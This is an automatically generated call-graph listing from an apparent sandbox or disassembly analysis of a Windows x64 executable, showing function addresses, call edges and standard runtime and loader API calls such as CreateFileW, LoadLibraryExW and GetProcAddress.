7ff6fabe144b 18948->18949 18950 7ff6fabe146c 18948->18950 18951 7ff6fabe1df0 81 API calls 18949->18951 18952 7ff6fabeeacc 73 API calls 18950->18952 18953 7ff6fabe145b 18951->18953 18954 7ff6fabe1481 18952->18954 18953->18041 18955 7ff6fabe1485 18954->18955 18956 7ff6fabe14a1 18954->18956 18957 7ff6fabe1db0 80 API calls 18955->18957 18958 7ff6fabe14d1 18956->18958 18959 7ff6fabe14b1 18956->18959 18967 7ff6fabe149c __vcrt_freefls 18957->18967 18962 7ff6fabe14d7 18958->18962 18966 7ff6fabe14ea 18958->18966 18960 7ff6fabe1db0 80 API calls 18959->18960 18960->18967 18961 7ff6fabee444 74 API calls 18963 7ff6fabe1564 18961->18963 18970 7ff6fabe11d0 18962->18970 18963->18041 18965 7ff6fabee794 _fread_nolock 53 API calls 18965->18966 18966->18965 18966->18967 18968 7ff6fabe1576 18966->18968 18967->18961 18969 7ff6fabe1db0 80 API calls 18968->18969 18969->18967 18971 7ff6fabe1228 18970->18971 18972 7ff6fabe122f 18971->18972 18973 7ff6fabe1257 18971->18973 18974 7ff6fabe1df0 81 API calls 18972->18974 18976 7ff6fabe1271 18973->18976 18977 7ff6fabe128d 18973->18977 18975 7ff6fabe1242 18974->18975 18975->18967 18978 7ff6fabe1db0 80 API calls 18976->18978 18979 7ff6fabe129f 18977->18979 18980 7ff6fabe12bb memcpy_s 18977->18980 18983 7ff6fabe1288 __vcrt_freefls 18978->18983 18981 7ff6fabe1db0 80 API calls 18979->18981 18982 7ff6fabee794 _fread_nolock 53 API calls 18980->18982 18980->18983 18984 7ff6fabe137f 18980->18984 18987 7ff6fabee508 37 API calls 18980->18987 18988 7ff6fabeeed4 18980->18988 18981->18983 18982->18980 18983->18967 18985 7ff6fabe1df0 81 API calls 18984->18985 18985->18983 18987->18980 18989 7ff6fabeef04 18988->18989 18992 7ff6fabeec24 18989->18992 19008 7ff6fabe314a 19007->19008 19009 7ff6fabe7800 2 API calls 19008->19009 19010 7ff6fabe316f 19009->19010 19011 7ff6fabea9b0 _log10_special 8 API calls 19010->19011 19012 7ff6fabe3197 19011->19012 19012->18051 19014 7ff6fabe670e 19013->19014 19015 7ff6fabe6832 19014->19015 19016 7ff6fabe1bd0 49 API calls 19014->19016 19017 7ff6fabea9b0 _log10_special 8 API calls 19015->19017 19021 7ff6fabe6795 19016->19021 19018 7ff6fabe6863 19017->19018 19018->18051 19019 7ff6fabe1bd0 49 API calls 19019->19021 19020 7ff6fabe3140 10 API calls 19020->19021 19021->19015 19021->19019 19021->19020 19022 7ff6fabe7800 2 API calls 19021->19022 19023 7ff6fabe6803 CreateDirectoryW 19022->19023 19023->19015 19023->19021 19025 7ff6fabe15b3 19024->19025 19026 7ff6fabe15d7 19024->19026 19113 7ff6fabe1030 19025->19113 19028 7ff6fabe31a0 108 API calls 19026->19028 19029 7ff6fabe15eb 19028->19029 19031 7ff6fabe15f3 19029->19031 19032 7ff6fabe161b 19029->19032 19030 7ff6fabe15b8 19033 7ff6fabe15ce 19030->19033 19036 7ff6fabe1df0 81 API calls 19030->19036 19034 7ff6fabe1db0 80 API calls 19031->19034 19035 7ff6fabe31a0 108 API calls 19032->19035 19033->18051 19037 7ff6fabe160a 19034->19037 19038 7ff6fabe162f 19035->19038 19036->19033 19037->18051 19039 7ff6fabe1651 19038->19039 19040 7ff6fabe1637 19038->19040 19042 7ff6fabeeacc 73 API calls 19039->19042 19041 7ff6fabe1df0 81 API calls 19040->19041 19043 7ff6fabe1647 19041->19043 19044 7ff6fabe1666 19042->19044 19047 7ff6fabee444 74 API calls 19043->19047 19045 7ff6fabe168b 19044->19045 19046 7ff6fabe166a 19044->19046 19048 7ff6fabe1691 19045->19048 19049 7ff6fabe16a9 19045->19049 19050 7ff6fabe1db0 80 API calls 19046->19050 19051 7ff6fabe17ad 19047->19051 19051->18051 19064 7ff6fabe5b6b 19062->19064 19065 7ff6fabe5b24 19062->19065 19064->18051 19065->19064 19152 7ff6fabf4d10 19065->19152 19067 7ff6fabe2d81 19066->19067 19068 7ff6fabe30c0 49 API calls 19067->19068 19069 7ff6fabe2dbb 19068->19069 19070 7ff6fabe30c0 49 API calls 19069->19070 19071 7ff6fabe2dcb 19070->19071 19072 7ff6fabe2ded 19071->19072 19073 7ff6fabe2e1c 19071->19073 19167 7ff6fabe2cf0 19072->19167 19075 7ff6fabe2cf0 51 API calls 19073->19075 19076 7ff6fabe2e1a 19075->19076 19077 7ff6fabe2e7c 19076->19077 19078 7ff6fabe2e47 19076->19078 19080 7ff6fabe2cf0 51 API calls 19077->19080 19174 7ff6fabe65d0 19078->19174 19082 7ff6fabe2ea0 19080->19082 19091 7ff6fabe2ef2 19082->19091 19111 7ff6fabe1bd0 49 API calls 19110->19111 19112 7ff6fabe3054 19111->19112 19112->18051 19114 7ff6fabe31a0 108 API calls 19113->19114 19115 7ff6fabe106b 19114->19115 19116 7ff6fabe1073 19115->19116 19117 7ff6fabe1088 19115->19117 19118 7ff6fabe1df0 81 API calls 19116->19118 19119 7ff6fabeeacc 73 API calls 19117->19119 19124 7ff6fabe1083 __vcrt_freefls 19118->19124 19120 7ff6fabe109d 19119->19120 19121 7ff6fabe10a1 19120->19121 19122 7ff6fabe10bd 19120->19122 19123 7ff6fabe1db0 80 API calls 19121->19123 19125 7ff6fabe10ed 19122->19125 19126 7ff6fabe10cd 19122->19126 19132 7ff6fabe10b8 __vcrt_freefls 19123->19132 19124->19030 19129 7ff6fabe10f3 19125->19129 19135 7ff6fabe1106 19125->19135 19127 7ff6fabe1db0 80 API calls 19126->19127 19127->19132 19128 7ff6fabee444 74 API calls 19131 7ff6fabe11d0 89 API calls 19129->19131 19131->19132 19132->19128 19134 7ff6fabee794 _fread_nolock 53 API calls 19134->19135 19135->19132 19135->19134 19136 7ff6fabe11ac 19135->19136 19137 7ff6fabe1db0 80 API calls 19136->19137 19137->19132 19153 7ff6fabf4d1d 19152->19153 19154 7ff6fabf4d4a 19152->19154 19156 7ff6fabfb108 _get_daylight 11 API calls 19153->19156 19160 7ff6fabf4cd4 19153->19160 19155 7ff6fabf4d6d 19154->19155 19158 7ff6fabf4d89 19154->19158 19157 7ff6fabfb108 _get_daylight 11 API calls 19155->19157 19159 7ff6fabf4d27 19156->19159 19161 7ff6fabf4d72 19157->19161 19162 7ff6fabf4c38 45 API calls 19158->19162 19163 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19159->19163 19160->19065 19164 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19161->19164 19166 7ff6fabf4d7d 19162->19166 19165 7ff6fabf4d32 19163->19165 19164->19166 19165->19065 19166->19065 19168 7ff6fabe2d16 19167->19168 19169 7ff6fabf4764 49 API calls 19168->19169 19171 7ff6fabe2d3c 19169->19171 19170 7ff6fabe2d4d 19170->19076 19171->19170 19172 7ff6fabe3140 10 API calls 19171->19172 19175 7ff6fabe65e5 19174->19175 19231 7ff6fabf5ce8 19230->19231 19232 7ff6fabf5d0e 19231->19232 19234 7ff6fabf5d41 19231->19234 19233 7ff6fabfb108 _get_daylight 11 API calls 19232->19233 19235 7ff6fabf5d13 19233->19235 19236 7ff6fabf5d54 19234->19236 19237 7ff6fabf5d47 19234->19237 19238 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19235->19238 19249 7ff6fabfa7b0 19236->19249 19239 7ff6fabfb108 _get_daylight 11 API calls 19237->19239 19241 7ff6fabe31f6 19238->19241 19239->19241 19241->18078 19262 7ff6fac001d8 EnterCriticalSection 19249->19262 19622 7ff6fabf7694 19621->19622 19625 7ff6fabf7170 19622->19625 19624 7ff6fabf76ad 19624->18088 19626 7ff6fabf71ba 19625->19626 19627 7ff6fabf718b 19625->19627 19635 7ff6fabf4f7c EnterCriticalSection 19626->19635 19628 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19627->19628 19631 7ff6fabf71ab 19628->19631 19631->19624 19637 7ff6fabee23b 19636->19637 19638 7ff6fabee269 19636->19638 19639 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19637->19639 19641 7ff6fabee25b 19638->19641 19646 7ff6fabf4f7c EnterCriticalSection 19638->19646 19639->19641 19641->18092 19648 7ff6fabe7800 2 API calls 19647->19648 19649 7ff6fabe73e4 LoadLibraryExW 19648->19649 19650 7ff6fabe7403 __vcrt_freefls 19649->19650 19650->18138 19652 7ff6fabe6113 GetProcAddress 19651->19652 19653 7ff6fabe60e9 19651->19653 19652->19653 19654 7ff6fabe6138 GetProcAddress 19652->19654 19656 7ff6fabe1ed0 80 API calls 19653->19656 19654->19653 19655 7ff6fabe615d GetProcAddress 19654->19655 19655->19653 19657 7ff6fabe6185 GetProcAddress 19655->19657 19658 7ff6fabe6103 19656->19658 19657->19653 19659 7ff6fabe61ad GetProcAddress 19657->19659 19658->18145 19659->19653 19710->18153 19711->18155 19713 7ff6fabe4d65 19712->19713 19714 7ff6fabe1bd0 49 API calls 19713->19714 19715 7ff6fabe4da1 19714->19715 19716 7ff6fabe4daa 19715->19716 19717 7ff6fabe4dcd 19715->19717 19719 7ff6fabe1df0 81 API calls 19716->19719 19718 7ff6fabe3210 49 API calls 19717->19718 19720 7ff6fabe4de5 19718->19720 19736 7ff6fabe4dc3 19719->19736 19721 7ff6fabe4e03 19720->19721 19722 7ff6fabe1df0 81 API calls 19720->19722 19723 7ff6fabe3140 10 API calls 19721->19723 19722->19721 19725 7ff6fabe4e0d 19723->19725 19724 7ff6fabea9b0 _log10_special 8 API calls 19726 7ff6fabe224e 19724->19726 19727 7ff6fabe4e1b 19725->19727 19728 7ff6fabe73d0 3 API calls 19725->19728 19726->18166 19743 7ff6fabe4ee0 19726->19743 19729 7ff6fabe3210 49 API calls 19727->19729 19728->19727 19730 7ff6fabe4e34 19729->19730 19731 7ff6fabe4e59 19730->19731 19732 7ff6fabe4e39 19730->19732 19733 7ff6fabe73d0 3 API calls 19731->19733 19734 7ff6fabe1df0 81 API calls 19732->19734 19735 7ff6fabe4e66 19733->19735 19734->19736 19737 7ff6fabe4e72 19735->19737 19738 7ff6fabe4ea9 19735->19738 19736->19724 19739 7ff6fabe7800 2 API calls 19737->19739 19797 7ff6fabe42e0 GetProcAddress 19738->19797 19882 7ff6fabe3eb0 19743->19882 19745 7ff6fabe4f1a 19746 7ff6fabe4f33 19745->19746 19747 7ff6fabe4f22 19745->19747 19889 7ff6fabe3680 19746->19889 19748 7ff6fabe1df0 81 API calls 19747->19748 19754 7ff6fabe4f2e 19748->19754 19754->18162 19883 7ff6fabe3edc 19882->19883 19884 7ff6fabe3ee4 19883->19884 19887 7ff6fabe4084 19883->19887 19920 7ff6fabf68c4 19883->19920 19884->19745 19885 7ff6fabe4247 __vcrt_freefls 19885->19745 19886 7ff6fabe33b0 47 API calls 19886->19887 19887->19885 19887->19886 19890 7ff6fabe36b0 19889->19890 19891 7ff6fabea9b0 _log10_special 8 API calls 19890->19891 19921 7ff6fabf68f4 19920->19921 19924 7ff6fabf5dc0 19921->19924 19925 7ff6fabf5e03 19924->19925 19926 7ff6fabf5df1 19924->19926 19928 7ff6fabf5e4d 19925->19928 19930 7ff6fabf5e10 19925->19930 19927 7ff6fabfb108 _get_daylight 11 API calls 19926->19927 19929 7ff6fabf5df6 19927->19929 19931 7ff6fabf5e68 19928->19931 19932 7ff6fabf4110 45 API calls 19928->19932 19935 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19930->19935 19932->19931 19985->18170 19987 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 19986->19987 19988 7ff6fabf9fe1 19987->19988 19989 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 19988->19989 19990 7ff6fabfa001 19989->19990 20046 7ff6fabf9519 20047 7ff6fabf9fd8 45 API calls 20046->20047 20048 7ff6fabf951e 20047->20048 20049 7ff6fabf9545 GetModuleHandleW 20048->20049 20050 7ff6fabf958f 20048->20050 20049->20050 20056 7ff6fabf9552 20049->20056 20058 7ff6fabf941c 20050->20058 20056->20050 20072 7ff6fabf9640 GetModuleHandleExW 20056->20072 20078 7ff6fac001d8 EnterCriticalSection 20058->20078 20073 7ff6fabf9674 GetProcAddress 20072->20073 20074 7ff6fabf969d 20072->20074 20077 7ff6fabf9686 20073->20077 20075 7ff6fabf96a2 FreeLibrary 20074->20075 20076 7ff6fabf96a9 20074->20076 20075->20076 20076->20050 20077->20074 20701 7ff6fabeafb0 20702 7ff6fabeafc0 20701->20702 20718 7ff6fabf9760 20702->20718 20704 7ff6fabeafcc 20724 7ff6fabeb2b8 20704->20724 20706 7ff6fabeb59c 7 API calls 20708 7ff6fabeb065 20706->20708 20707 7ff6fabeafe4 _RTC_Initialize 20716 7ff6fabeb039 20707->20716 20729 7ff6fabeb468 20707->20729 20710 7ff6fabeaff9 20732 7ff6fabf8bd0 20710->20732 20716->20706 20717 7ff6fabeb055 20716->20717 20719 7ff6fabf9771 20718->20719 20720 7ff6fabf9779 20719->20720 20721 7ff6fabfb108 _get_daylight 11 API calls 20719->20721 20720->20704 20722 7ff6fabf9788 20721->20722 20723 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20722->20723 20723->20720 20725 7ff6fabeb2c9 20724->20725 20728 7ff6fabeb2ce __scrt_release_startup_lock 20724->20728 20726 7ff6fabeb59c 7 API calls 20725->20726 20725->20728 20727 7ff6fabeb342 20726->20727 20728->20707 20757 7ff6fabeb42c 20729->20757 20731 7ff6fabeb471 20731->20710 20733 7ff6fabf8bf0 20732->20733 20747 7ff6fabeb005 20732->20747 20734 7ff6fabf8c0e GetModuleFileNameW 20733->20734 20735 7ff6fabf8bf8 20733->20735 20739 7ff6fabf8c39 20734->20739 20736 7ff6fabfb108 _get_daylight 11 API calls 20735->20736 20737 7ff6fabf8bfd 20736->20737 20738 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20737->20738 20738->20747 20772 7ff6fabf8b70 20739->20772 20742 7ff6fabf8c81 20743 7ff6fabfb108 _get_daylight 11 API calls 20742->20743 20744 7ff6fabf8c86 20743->20744 20745 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20744->20745 20745->20747 20746 7ff6fabf8c99 20749 7ff6fabf8ce7 20746->20749 20750 7ff6fabf8d00 20746->20750 20754 7ff6fabf8cbb 20746->20754 20747->20716 20756 7ff6fabeb53c InitializeSListHead 20747->20756 20748 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20748->20747 20751 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20749->20751 20750->20750 20752 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20750->20752 20753 7ff6fabf8cf0 20751->20753 20752->20754 20755 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20753->20755 20754->20748 20755->20747 20758 7ff6fabeb446 20757->20758 20760 7ff6fabeb43f 20757->20760 20761 7ff6fabf9dec 20758->20761 20760->20731 20764 7ff6fabf9a28 20761->20764 20771 7ff6fac001d8 EnterCriticalSection 20764->20771 20773 7ff6fabf8b88 20772->20773 20777 7ff6fabf8bc0 20772->20777 20774 7ff6fabfeb84 _get_daylight 11 API calls 20773->20774 20773->20777 20775 7ff6fabf8bb6 20774->20775 20776 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20775->20776 20776->20777 20777->20742 20777->20746 20778 7ff6fac014b0 20789 7ff6fac07444 20778->20789 20790 7ff6fac07451 20789->20790 20791 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20790->20791 20792 7ff6fac0746d 20790->20792 20791->20790 20793 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20792->20793 20794 7ff6fac014b9 20792->20794 20793->20792 20795 7ff6fac001d8 EnterCriticalSection 20794->20795 16543 7ff6fabf5444 16544 7ff6fabf545e 16543->16544 16545 7ff6fabf547b 16543->16545 16594 7ff6fabfb0e8 16544->16594 16545->16544 16546 7ff6fabf548e CreateFileW 16545->16546 16548 7ff6fabf54c2 16546->16548 16549 7ff6fabf54f8 16546->16549 16568 7ff6fabf5598 GetFileType 16548->16568 16603 7ff6fabf5a20 16549->16603 16558 7ff6fabf54ed CloseHandle 16563 7ff6fabf5476 16558->16563 16559 7ff6fabf54d7 CloseHandle 16559->16563 16560 7ff6fabf5501 16624 7ff6fabfb07c 16560->16624 16561 7ff6fabf552c 16629 7ff6fabf57e0 16561->16629 16567 7ff6fabf550b 16567->16563 16569 7ff6fabf56a3 16568->16569 16570 7ff6fabf55e6 16568->16570 16572 7ff6fabf56cd 16569->16572 16573 7ff6fabf56ab 16569->16573 16571 7ff6fabf5612 GetFileInformationByHandle 16570->16571 16575 7ff6fabf591c 21 API calls 16570->16575 16576 7ff6fabf56be GetLastError 16571->16576 16577 7ff6fabf563b 16571->16577 16574 7ff6fabf56f0 PeekNamedPipe 16572->16574 16593 7ff6fabf568e 16572->16593 16573->16576 16578 7ff6fabf56af 16573->16578 16574->16593 16579 7ff6fabf5600 16575->16579 16582 7ff6fabfb07c _fread_nolock 11 API calls 16576->16582 16580 7ff6fabf57e0 51 API calls 16577->16580 16581 7ff6fabfb108 _get_daylight 11 API calls 16578->16581 16579->16571 16579->16593 16584 7ff6fabf5646 16580->16584 16581->16593 16582->16593 16646 7ff6fabf5740 16584->16646 16588 7ff6fabf5740 10 API calls 16589 7ff6fabf5665 16588->16589 16590 7ff6fabf5740 10 API calls 16589->16590 16591 7ff6fabf5676 16590->16591 16592 7ff6fabfb108 _get_daylight 11 API calls 16591->16592 16591->16593 16592->16593 16653 7ff6fabea9b0 16593->16653 16667 7ff6fabfae48 GetLastError 16594->16667 16596 7ff6fabf5463 16597 7ff6fabfb108 16596->16597 16598 7ff6fabfae48 _get_daylight 11 API calls 16597->16598 16599 7ff6fabf546b 16598->16599 16600 7ff6fabfa4a4 16599->16600 16725 7ff6fabfa33c 16600->16725 16602 7ff6fabfa4bd 16602->16563 16604 7ff6fabf5a56 16603->16604 16605 7ff6fabfb108 _get_daylight 11 API calls 16604->16605 16623 7ff6fabf5aee __vcrt_freefls 16604->16623 16607 7ff6fabf5a68 16605->16607 16606 7ff6fabea9b0 _log10_special 8 API calls 16608 7ff6fabf54fd 16606->16608 16609 7ff6fabfb108 _get_daylight 11 API calls 16607->16609 16608->16560 16608->16561 16610 7ff6fabf5a70 16609->16610 16777 7ff6fabf79bc 16610->16777 16612 7ff6fabf5a85 16613 7ff6fabf5a8d 16612->16613 16614 7ff6fabf5a97 16612->16614 16615 7ff6fabfb108 _get_daylight 11 API calls 16613->16615 16616 7ff6fabfb108 _get_daylight 11 API calls 16614->16616 16620 7ff6fabf5a92 16615->16620 16617 7ff6fabf5a9c 16616->16617 16618 7ff6fabfb108 _get_daylight 11 API calls 16617->16618 16617->16623 16619 7ff6fabf5aa6 16618->16619 16621 7ff6fabf79bc 45 API calls 16619->16621 16622 7ff6fabf5ae0 GetDriveTypeW 16620->16622 16620->16623 16621->16620 16622->16623 16623->16606 16625 7ff6fabfae48 _get_daylight 11 API calls 16624->16625 16626 7ff6fabfb089 Concurrency::details::SchedulerProxy::DeleteThis 16625->16626 16627 7ff6fabfae48 _get_daylight 11 API calls 16626->16627 16628 7ff6fabfb0ab 16627->16628 16628->16567 16631 7ff6fabf5808 16629->16631 16630 7ff6fabf5539 16639 7ff6fabf591c 16630->16639 16631->16630 16871 7ff6fabff624 16631->16871 16633 7ff6fabf589c 16633->16630 16634 7ff6fabff624 51 API calls 16633->16634 16635 7ff6fabf58af 16634->16635 16635->16630 16636 7ff6fabff624 51 API calls 16635->16636 16637 7ff6fabf58c2 16636->16637 16637->16630 16638 7ff6fabff624 51 API calls 16637->16638 16638->16630 16640 7ff6fabf5936 16639->16640 16641 7ff6fabf596d 16640->16641 16642 7ff6fabf5946 16640->16642 16643 7ff6fabff4b8 21 API calls 16641->16643 16644 7ff6fabfb07c _fread_nolock 11 API calls 16642->16644 16645 7ff6fabf5956 16642->16645 16643->16645 16644->16645 16645->16567 16647 7ff6fabf575c 16646->16647 16648 7ff6fabf5769 FileTimeToSystemTime 16646->16648 16647->16648 16650 7ff6fabf5764 16647->16650 16649 7ff6fabf577d SystemTimeToTzSpecificLocalTime 16648->16649 16648->16650 16649->16650 16651 7ff6fabea9b0 _log10_special 8 API calls 16650->16651 16652 7ff6fabf5655 16651->16652 16652->16588 16654 7ff6fabea9b9 16653->16654 16655 7ff6fabead40 IsProcessorFeaturePresent 16654->16655 16656 7ff6fabea9c4 16654->16656 16657 7ff6fabead58 16655->16657 16656->16558 16656->16559 16662 7ff6fabeaf38 RtlCaptureContext 16657->16662 16663 7ff6fabeaf52 RtlLookupFunctionEntry 16662->16663 16664 7ff6fabead6b 16663->16664 16665 7ff6fabeaf68 RtlVirtualUnwind 16663->16665 16666 7ff6fabead00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16664->16666 16665->16663 16665->16664 16668 7ff6fabfae6c 16667->16668 16669 7ff6fabfae89 FlsSetValue 16667->16669 16668->16669 16681 7ff6fabfae79 SetLastError 16668->16681 16670 7ff6fabfae9b 16669->16670 16669->16681 16684 7ff6fabfeb84 16670->16684 16674 7ff6fabfaec8 FlsSetValue 16677 7ff6fabfaed4 FlsSetValue 16674->16677 16678 7ff6fabfaee6 16674->16678 16675 7ff6fabfaeb8 FlsSetValue 16676 7ff6fabfaec1 16675->16676 16691 7ff6fabfa0e4 16676->16691 16677->16676 16697 7ff6fabfaa7c 16678->16697 16681->16596 16690 7ff6fabfeb95 _get_daylight 16684->16690 16685 7ff6fabfebe6 16687 7ff6fabfb108 _get_daylight 10 API calls 16685->16687 16686 7ff6fabfebca HeapAlloc 16688 7ff6fabfaeaa 16686->16688 16686->16690 16687->16688 16688->16674 16688->16675 16690->16685 16690->16686 16702 7ff6fac03390 16690->16702 16692 7ff6fabfa0e9 RtlFreeHeap 16691->16692 16696 7ff6fabfa118 16691->16696 16693 7ff6fabfa104 GetLastError 16692->16693 16692->16696 16694 7ff6fabfa111 Concurrency::details::SchedulerProxy::DeleteThis 16693->16694 16695 7ff6fabfb108 _get_daylight 9 API calls 16694->16695 16695->16696 16696->16681 16711 7ff6fabfa954 16697->16711 16705 7ff6fac033d0 16702->16705 16710 7ff6fac001d8 EnterCriticalSection 16705->16710 16723 7ff6fac001d8 EnterCriticalSection 16711->16723 16726 7ff6fabfa367 16725->16726 16729 7ff6fabfa3d8 16726->16729 16728 7ff6fabfa38e 16728->16602 16739 7ff6fabfa120 16729->16739 16733 7ff6fabfa413 16733->16728 16740 7ff6fabfa13c GetLastError 16739->16740 16741 7ff6fabfa177 16739->16741 16742 7ff6fabfa14c 16740->16742 16741->16733 16745 7ff6fabfa18c 16741->16745 16752 7ff6fabfaf10 16742->16752 16746 7ff6fabfa1c0 16745->16746 16747 7ff6fabfa1a8 GetLastError SetLastError 16745->16747 16746->16733 16748 7ff6fabfa4c4 IsProcessorFeaturePresent 16746->16748 16747->16746 16749 7ff6fabfa4d7 16748->16749 16769 7ff6fabfa1d8 16749->16769 16753 7ff6fabfaf2f FlsGetValue 16752->16753 16754 7ff6fabfaf4a FlsSetValue 16752->16754 16755 7ff6fabfaf44 16753->16755 16757 7ff6fabfa167 SetLastError 16753->16757 16756 7ff6fabfaf57 16754->16756 16754->16757 16755->16754 16758 7ff6fabfeb84 _get_daylight 11 API calls 16756->16758 16757->16741 16759 7ff6fabfaf66 16758->16759 16760 7ff6fabfaf84 FlsSetValue 16759->16760 16761 7ff6fabfaf74 FlsSetValue 16759->16761 16763 7ff6fabfafa2 16760->16763 16764 7ff6fabfaf90 FlsSetValue 16760->16764 16762 7ff6fabfaf7d 16761->16762 16765 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16762->16765 16766 7ff6fabfaa7c _get_daylight 11 API calls 16763->16766 16764->16762 16765->16757 16767 7ff6fabfafaa 16766->16767 16768 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16767->16768 16768->16757 16770 7ff6fabfa212 _isindst memcpy_s 16769->16770 16771 7ff6fabfa23a RtlCaptureContext RtlLookupFunctionEntry 16770->16771 16772 7ff6fabfa274 RtlVirtualUnwind 16771->16772 16773 7ff6fabfa2aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16771->16773 16772->16773 16774 7ff6fabfa2fc _isindst 16773->16774 16775 7ff6fabea9b0 _log10_special 8 API calls 16774->16775 16776 7ff6fabfa31b GetCurrentProcess TerminateProcess 16775->16776 16778 7ff6fabf79d8 16777->16778 16779 7ff6fabf7a46 16777->16779 16778->16779 16781 7ff6fabf79dd 16778->16781 16814 7ff6fac005cc 16779->16814 16782 7ff6fabf79f5 16781->16782 16783 7ff6fabf7a12 16781->16783 16789 7ff6fabf778c GetFullPathNameW 16782->16789 16797 7ff6fabf7800 GetFullPathNameW 16783->16797 16788 7ff6fabf7a0a __vcrt_freefls 16788->16612 16790 7ff6fabf77b2 GetLastError 16789->16790 16793 7ff6fabf77c8 16789->16793 16791 7ff6fabfb07c _fread_nolock 11 API calls 16790->16791 16794 7ff6fabf77bf 16791->16794 16792 7ff6fabf77c4 16792->16788 16793->16792 16796 7ff6fabfb108 _get_daylight 11 API calls 16793->16796 16795 7ff6fabfb108 _get_daylight 11 API calls 16794->16795 16795->16792 16796->16792 16798 7ff6fabf7833 GetLastError 16797->16798 16802 7ff6fabf7849 __vcrt_freefls 16797->16802 16799 7ff6fabfb07c _fread_nolock 11 API calls 16798->16799 16800 7ff6fabf7840 16799->16800 16803 7ff6fabfb108 _get_daylight 11 API calls 16800->16803 16801 7ff6fabf7845 16805 7ff6fabf78d8 16801->16805 16802->16801 16804 7ff6fabf78a3 GetFullPathNameW 16802->16804 16803->16801 16804->16798 16804->16801 16806 7ff6fabf794c memcpy_s 16805->16806 16808 7ff6fabf7901 memcpy_s 16805->16808 16806->16788 16807 7ff6fabf7935 16809 7ff6fabfb108 _get_daylight 11 API calls 16807->16809 16808->16806 16808->16807 16811 7ff6fabf796e 16808->16811 16813 7ff6fabf793a 16809->16813 16810 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16810->16806 16811->16806 16812 7ff6fabfb108 _get_daylight 11 API calls 16811->16812 16812->16813 16813->16810 16817 7ff6fac003dc 16814->16817 16818 7ff6fac0041e 16817->16818 16819 7ff6fac00407 16817->16819 16820 7ff6fac00443 16818->16820 16821 7ff6fac00422 16818->16821 16822 7ff6fabfb108 _get_daylight 11 API calls 16819->16822 16855 7ff6fabff4b8 16820->16855 16843 7ff6fac00548 16821->16843 16825 7ff6fac0040c 16822->16825 16829 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16825->16829 16827 7ff6fac00448 16832 7ff6fac004ed 16827->16832 16838 7ff6fac0046f 16827->16838 16828 7ff6fac0042b 16830 7ff6fabfb0e8 _fread_nolock 11 API calls 16828->16830 16842 7ff6fac00417 __vcrt_freefls 16829->16842 16831 7ff6fac00430 16830->16831 16835 7ff6fabfb108 _get_daylight 11 API calls 16831->16835 16832->16819 16833 7ff6fac004f5 16832->16833 16836 7ff6fabf778c 13 API calls 16833->16836 16834 7ff6fabea9b0 _log10_special 8 API calls 16837 7ff6fac0053d 16834->16837 16835->16825 16836->16842 16837->16788 16839 7ff6fabf7800 14 API calls 16838->16839 16840 7ff6fac004b3 16839->16840 16841 7ff6fabf78d8 37 API calls 16840->16841 16840->16842 16841->16842 16842->16834 16844 7ff6fac00592 16843->16844 16845 7ff6fac00562 16843->16845 16846 7ff6fac0059d GetDriveTypeW 16844->16846 16849 7ff6fac0057d 16844->16849 16847 7ff6fabfb0e8 _fread_nolock 11 API calls 16845->16847 16846->16849 16848 7ff6fac00567 16847->16848 16850 7ff6fabfb108 _get_daylight 11 API calls 16848->16850 16851 7ff6fabea9b0 _log10_special 8 API calls 16849->16851 16852 7ff6fac00572 16850->16852 16853 7ff6fac00427 16851->16853 16854 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16852->16854 16853->16827 16853->16828 16854->16849 16869 7ff6fac0a5b0 16855->16869 16858 7ff6fabff505 16861 7ff6fabea9b0 _log10_special 8 API calls 16858->16861 16859 7ff6fabff52c 16860 7ff6fabfeb84 _get_daylight 11 API calls 16859->16860 16862 7ff6fabff53b 16860->16862 16863 7ff6fabff599 16861->16863 16864 7ff6fabff545 GetCurrentDirectoryW 16862->16864 16865 7ff6fabff554 16862->16865 16863->16827 16864->16865 16866 7ff6fabff559 16864->16866 16867 7ff6fabfb108 _get_daylight 11 API calls 16865->16867 16868 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16866->16868 16867->16866 16868->16858 16870 7ff6fabff4ee GetCurrentDirectoryW 16869->16870 16870->16858 16870->16859 16872 7ff6fabff631 16871->16872 16873 7ff6fabff655 16871->16873 16872->16873 16874 7ff6fabff636 16872->16874 16876 7ff6fabff68f 16873->16876 16877 7ff6fabff6ae 16873->16877 16875 7ff6fabfb108 _get_daylight 11 API calls 16874->16875 16878 7ff6fabff63b 16875->16878 16879 7ff6fabfb108 _get_daylight 11 API calls 16876->16879 16888 7ff6fabf4c38 16877->16888 16881 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16878->16881 16882 7ff6fabff694 16879->16882 16884 7ff6fabff646 16881->16884 16883 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16882->16883 16885 7ff6fabff69f 16883->16885 16884->16633 16885->16633 16886 7ff6fac05320 51 API calls 16887 7ff6fabff6bb 16886->16887 16887->16885 16887->16886 16889 